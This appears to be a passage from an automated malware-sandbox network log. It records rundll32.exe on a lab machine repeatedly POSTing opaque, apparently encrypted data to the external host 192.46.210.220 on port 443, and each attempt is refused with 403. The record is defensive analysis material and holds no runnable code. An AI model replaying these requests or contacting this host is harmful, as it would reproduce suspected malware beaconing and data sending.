                                                                                                      2021-10-28 02:48:48 UTC354OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:48 UTC359INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      72192.168.2.750137192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:50 UTC359OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:50 UTC359OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:50 UTC364INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      73192.168.2.750141192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:52 UTC364OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:52 UTC364OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:52 UTC369INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      74192.168.2.750145192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:53 UTC369OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:53 UTC369OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:54 UTC374INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.750150192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:56 UTC374OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:56 UTC374OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:56 UTC379INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      76192.168.2.750153192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:57 UTC379OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:57 UTC379OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:58 UTC384INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      77192.168.2.750158192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:01 UTC384OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:01 UTC384OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:01 UTC389INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      78192.168.2.750160192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:02 UTC389OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:02 UTC389OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:02 UTC394INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      79192.168.2.750166192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:04 UTC394OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:04 UTC394OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:05 UTC399INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.749808192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:41 UTC39OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:41 UTC40OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:42 UTC44INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      80192.168.2.750168192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:05 UTC399OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:05 UTC399OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:06 UTC404INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      81192.168.2.750174192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:08 UTC404OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:08 UTC404OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:09 UTC409INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      82192.168.2.750176192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:09 UTC409OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:49:09 UTC409OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:49:10 UTC414INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:49:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      83192.168.2.750182192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:49:12 UTC414OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
